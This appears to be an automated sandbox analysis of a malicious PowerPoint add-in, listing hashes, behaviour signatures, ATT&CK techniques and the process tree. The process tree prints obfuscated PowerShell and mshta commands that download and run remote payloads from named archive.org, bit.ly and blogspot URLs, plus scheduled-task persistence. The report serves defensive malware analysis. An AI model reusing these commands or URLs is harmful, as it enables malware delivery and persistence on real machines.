Analysis

  • max time kernel
    41s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    12-07-2021 14:59

General

  • Target

    IdDetails.ppam

  • Size

    16KB

  • MD5

    8fb67950eee24c33116c5c8ae87bbde1

  • SHA1

    26d8b5eec451ed68f3a61f4f69b4fadffb736d22

  • SHA256

    a524b17edc79f1cacd57f9a07becfd24df6d0ef893d11620cb3c300c86c327ed

  • SHA512

    1c03f7930d08ad4ea8d7fc0f8527d5db6bc618989e8ab9183abe05309d6b9f75f0eef61271059a576e2709a7d6ec5385f206d48ca99eeda9832148fa1117c9e3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 23 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\IdDetails.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:332
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1292
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://www.bitly.com/ashjdkqowdhqowdh
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://ia801508.us.archive.org/34/items/Coxes/Coxes.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1660
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Public\lub.vbs"
            4⤵
              PID:2024
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/1.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia801403.us.archive.org/11/items/3_20210710_20210710/2.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://ia601403.us.archive.org/11/items/3_20210710_20210710/3.txt').GetResponse().GetResponseStream()).ReadToend());
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:992
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""BlueStacks"" /F /tr ""\""MsHtA""\""http://1230948%1230948@backishbackuponback.blogspot.com/p/clientsced.html\""
            3⤵
            • Creates scheduled task(s)
            PID:1664
      • C:\Windows\system32\schtasks.exe
        schtasks /create /sc MINUTE /mo 80 /tn ""BatFile"" /F /tr ""\""C:\Users\Public\clone.vbs""
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1884

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      2
      T1112

      Install Root Certificate

      1
      T1130

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        MD5

        2902de11e30dcc620b184e3bb0f0c1cb

        SHA1

        5d11d14a2558801a2688dc2d6dfad39ac294f222

        SHA256

        e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

        SHA512

        efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        MD5

        3d9dbbe1541cac4c816430030ea245fe

        SHA1

        8676d3117a6be5c0d72504c6dffddca36de7e94f

        SHA256

        fb679c14b737b62dc15a9da52833dabd48d8dd937b4ebaf4ff9099d43dff0111

        SHA512

        1fcf9613f5bfd58eb7f68bfbd3bb7de6543352992ff3e140ab5e7b79cbd41174a370a942d7656da396dbc08e985a88e28050fc33e36e9dc5b5d912d6a4ac729f

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        MD5

        779839e56702317d8837a184225e19c2

        SHA1

        1666e46042e1b17218c0a419f6102fab1a5b8905

        SHA256

        636e26c716c4637c1b8776c721ecec859f92e2cccae6a96bb914955307fcfda3

        SHA512

        d11f47729ee72d14cb692e3583f9ea9afd0e6651b6283aab6404b23333d736ca4be742d86e62d2513cbdf106d2c07b99d7080687162bb080b5a8a796de8f1e54

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        358dad07550d32d0f301bb26260f77a8

        SHA1

        cc2b945ceab92ff3c2d4ff5d9f4d9baa682749da

        SHA256

        19a77eea0cb85bbb847df12e8bb2837bfda2803ef77129c755a6d2f090fc7a28

        SHA512

        0bd6e6eb129fd6968d5f0b8709243f327c691133a9608bcf4e780cbd3c7f442fd0a14c8fc3f9bfe63ca6b985cae00292b5f0e985f50257f6fe9054b690e51696

      • C:\Users\Public\lub.vbs
        MD5

        1edd4ddfe49d879dd3c977804a05b9bd

        SHA1

        17157ecc88f381e568f36b9263044450e9dfccbe

        SHA256

        d8a10361792b7d54e4084a5a9736e3c8e47e805be894b9a7965e48793f591efa

        SHA512

        6a75daef70bb16da4f33f33fe8e7263b35e327205c2c0f0cc1e44445c8103021ff200830698013f9ad8b3179127ae45a9260b8d10a2bc147417dc378d3a6d0df

      • memory/332-59-0x0000000074171000-0x0000000074175000-memory.dmp
        Filesize

        16KB

      • memory/332-66-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/332-63-0x0000000075FF1000-0x0000000075FF3000-memory.dmp
        Filesize

        8KB

      • memory/332-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/332-60-0x0000000071211000-0x0000000071213000-memory.dmp
        Filesize

        8KB

      • memory/992-83-0x0000000005300000-0x0000000005301000-memory.dmp
        Filesize

        4KB

      • memory/992-69-0x0000000000000000-mapping.dmp
      • memory/992-73-0x0000000002480000-0x0000000002481000-memory.dmp
        Filesize

        4KB

      • memory/992-75-0x0000000004920000-0x0000000004921000-memory.dmp
        Filesize

        4KB

      • memory/992-78-0x00000000048E0000-0x00000000048E1000-memory.dmp
        Filesize

        4KB

      • memory/992-79-0x00000000048E2000-0x00000000048E3000-memory.dmp
        Filesize

        4KB

      • memory/1292-64-0x000007FEFBBB1000-0x000007FEFBBB3000-memory.dmp
        Filesize

        8KB

      • memory/1292-62-0x0000000000000000-mapping.dmp
      • memory/1660-67-0x0000000000000000-mapping.dmp
      • memory/1660-102-0x0000000006270000-0x0000000006271000-memory.dmp
        Filesize

        4KB

      • memory/1660-87-0x0000000005610000-0x0000000005611000-memory.dmp
        Filesize

        4KB

      • memory/1660-92-0x00000000056D0000-0x00000000056D1000-memory.dmp
        Filesize

        4KB

      • memory/1660-80-0x00000000048C2000-0x00000000048C3000-memory.dmp
        Filesize

        4KB

      • memory/1660-77-0x00000000048C0000-0x00000000048C1000-memory.dmp
        Filesize

        4KB

      • memory/1660-95-0x0000000006190000-0x0000000006191000-memory.dmp
        Filesize

        4KB

      • memory/1660-81-0x0000000002500000-0x0000000002501000-memory.dmp
        Filesize

        4KB

      • memory/1660-103-0x000000007EF30000-0x000000007EF31000-memory.dmp
        Filesize

        4KB

      • memory/1660-104-0x0000000006300000-0x0000000006301000-memory.dmp
        Filesize

        4KB

      • memory/1660-105-0x00000000062A0000-0x00000000062A1000-memory.dmp
        Filesize

        4KB

      • memory/1660-106-0x0000000006630000-0x0000000006631000-memory.dmp
        Filesize

        4KB

      • memory/1660-107-0x00000000063D0000-0x00000000063D1000-memory.dmp
        Filesize

        4KB

      • memory/1664-70-0x0000000000000000-mapping.dmp
      • memory/1692-65-0x0000000000000000-mapping.dmp
      • memory/2024-109-0x0000000000000000-mapping.dmp